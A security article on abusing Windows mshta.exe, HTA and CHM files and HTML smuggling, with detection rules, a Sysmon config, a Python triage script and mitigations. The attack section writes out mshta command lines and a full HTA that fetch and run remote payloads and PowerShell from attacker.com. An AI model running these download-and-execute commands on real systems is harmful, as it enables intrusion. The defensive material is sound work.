Microsoft Tools & Hacks

Hide Malware Using Microsoft HTML Interpreters

Introduction

Microsoft provides several HTML rendering engines and interpreters as part of the Windows operating system. Attackers have discovered that these legitimate tools can be weaponized to execute malicious code while bypassing many security controls.

MSHTA.exe (Microsoft HTML Application Host)

Overview

mshta.exe is a legitimate Windows utility that executes Microsoft HTML Applications (HTA files). HTA files are rendered by the same engine as Internet Explorer, but they run as "fully trusted" applications with access to the file system, registry, and other system resources.

Attack Capabilities

MSHTA can execute:

  • Local HTA files
  • Remote HTA files via URL
  • Inline VBScript or JavaScript

# Execute remote HTA
mshta.exe http://attacker.com/payload.hta

# Inline VBScript execution
mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -ep bypass"":close")

# Inline JavaScript
mshta.exe javascript:a=(GetObject("script:http://attacker.com/payload.sct"));close();

Why It's Effective

  • Signed by Microsoft: mshta.exe is a trusted, signed binary
  • Present on all Windows: Available on every Windows installation
  • Bypasses AppLocker: Default AppLocker rules allow mshta.exe execution
  • No file on disk: Inline scripts leave minimal forensic artifacts

Other HTML-Based Attack Vectors

HTA Files

HTML Applications (.hta) can contain full-featured scripts:

<html>
<head>
<script language="VBScript">
Sub Window_onLoad
    Set shell = CreateObject("Wscript.Shell")
    shell.Run "powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/ps.ps1')"
    self.close
End Sub
</script>
</head>
<body></body>
</html>

Compiled HTML Help Files (.chm)

Windows Help files can contain embedded scripts:

  • Use hhc.exe to compile HTML into CHM format
  • Scripts execute when the help file is opened
  • Can be distributed via email attachments
  • Often bypass email security filters

HTML Smuggling

A technique where the malicious payload is constructed client-side:

  • JavaScript assembles binary data from encoded strings
  • Creates a Blob object and triggers download
  • Bypasses network-level inspection
  • Used by Nobelium (SolarWinds attackers) and other APTs

Detection Strategies

Process Monitoring

Key indicators to watch for:

  Parent Process   Child Process    Severity
  mshta.exe        powershell.exe   Critical
  mshta.exe        cmd.exe          Critical
  mshta.exe        wscript.exe      High
  mshta.exe        cscript.exe      High
  mshta.exe        regsvr32.exe     Critical

Network Monitoring

  • Monitor mshta.exe network connections
  • Block HTA downloads at the proxy level
  • Inspect URLs accessed by mshta.exe

Sysmon Configuration

<RuleGroup name="MSHTA Monitoring" groupRelation="or">
    <ProcessCreate onmatch="include">
        <ParentImage condition="contains">mshta.exe</ParentImage>
    </ProcessCreate>
    <NetworkConnect onmatch="include">
        <Image condition="contains">mshta.exe</Image>
    </NetworkConnect>
</RuleGroup>
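The parent/child table above and the Sysmon rule can be turned into a small triage script. The following is an added example, not code from the original page: it scores constructed process-creation records (the field names mirror Sysmon EventID 1, the records themselves are made up) using the page's severity table, and additionally flags mshta.exe itself when its command line carries an inline vbscript:/javascript: payload or a remote URL.

```python
import re
from typing import Optional

# Severity of mshta.exe spawning each child, taken from the page's table.
CHILD_SEVERITY = {
    "powershell.exe": "Critical",
    "cmd.exe": "Critical",
    "wscript.exe": "High",
    "cscript.exe": "High",
    "regsvr32.exe": "Critical",
}

# Inline script protocols and remote URLs passed straight to mshta.exe.
INLINE_PROTO = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[dict]:
    """Score one ProcessCreate record; return None when no rule matches."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if parent == "mshta.exe" and image in CHILD_SEVERITY:
        return {"severity": CHILD_SEVERITY[image], "reason": f"mshta.exe spawned {image}"}
    if image == "mshta.exe":
        if INLINE_PROTO.search(cmdline):
            return {"severity": "High", "reason": "inline script passed to mshta.exe"}
        if REMOTE_URL.search(cmdline):
            return {"severity": "High", "reason": "mshta.exe launched with a remote URL"}
    return None


def scan(events: list) -> list:
    """Return (Image, verdict) pairs for every record that matched a rule."""
    return [(e["Image"], hit) for e in events for hit in [classify(e)] if hit]


# Constructed sample records (not real telemetry) in the shape Sysmon emits.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe javascript:close()"},                       # inline script
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "CommandLine": "powershell -ep bypass"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://placeholder.invalid/payload.hta"},  # remote HTA
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},                              # benign
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "wscript.exe stage2.vbs"},
]
```

Running scan(SAMPLE_EVENTS) yields four hits; the local notepad.exe launch is the only record left unflagged.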

Mitigation

  1. Block mshta.exe: Use AppLocker or WDAC to prevent execution where not needed
  2. Disable HTA file associations: Remove .hta file type associations
  3. Email filtering: Block HTA, CHM, and HTML attachments with embedded scripts
  4. Proxy restrictions: Block mshta.exe from making outbound connections
  5. Windows Defender ASR: Enable "Block execution of potentially obfuscated scripts" rule

Conclusion

Microsoft's HTML interpreters represent a significant attack surface that is often overlooked by security teams. Understanding how these tools can be abused is essential for building effective defensive strategies.